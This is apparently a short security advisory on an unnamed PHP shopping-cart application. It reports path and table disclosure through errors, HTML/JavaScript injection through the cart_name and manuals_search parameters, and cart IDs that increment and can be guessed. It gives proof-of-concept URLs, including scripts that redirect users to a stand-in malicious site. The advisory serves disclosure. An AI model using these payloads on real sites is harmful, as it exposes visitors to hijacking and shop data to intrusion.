===============================================================
!discussion 1 - Full Path Disclosure
The server will give an error when any URL real/imaginary is
passed to the POST_DATA parameter:
http://www.victim.com/manuals_search.php?POST_DATA=http://site-that-does-not-exist.com
===============================================================
!discussion 2 - Information Disclosure
When a user is not signed in, the tables are shown to the
attacker via an error, because the PHP form fails to properly
sanitize user_id since the user is not logged in.
===============================================================
!discussion 3 - Arbitrary Code Injection
The attacker is able to create shopping carts with
HTML/Javascript injected code such as:
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><a href="http://www.google.com">Google</a></html>
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>alert("VULN");</script></html>
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>window.location="http://malicious-site.com";</script></html>
Then when the user visits "My Saved Carts" at
http://victim.com/user_carts.php the code is executed:
Example 1 would give a link to the Google search engine.
Example 2 would give a javascript alert popup displaying "VULN".
Example 3 would send the user to a malicious site.
Note: manuals_search.php is also vulnerable to the same
HTML/Javascript vulnerability that allows for arbitrary code to
be executed:
http://www.victim.com/manuals_search.php?manuals_search=<html><script>window.location="http://malicious-site.com";</script></html>
===============================================================
!extras
The Cart name is all that needs to be guessed/brute-forced for
an attacker to gain entry to the shopping cart. As the cart-id
increments from 1 upwards. This does not require any user-login
from the attacker.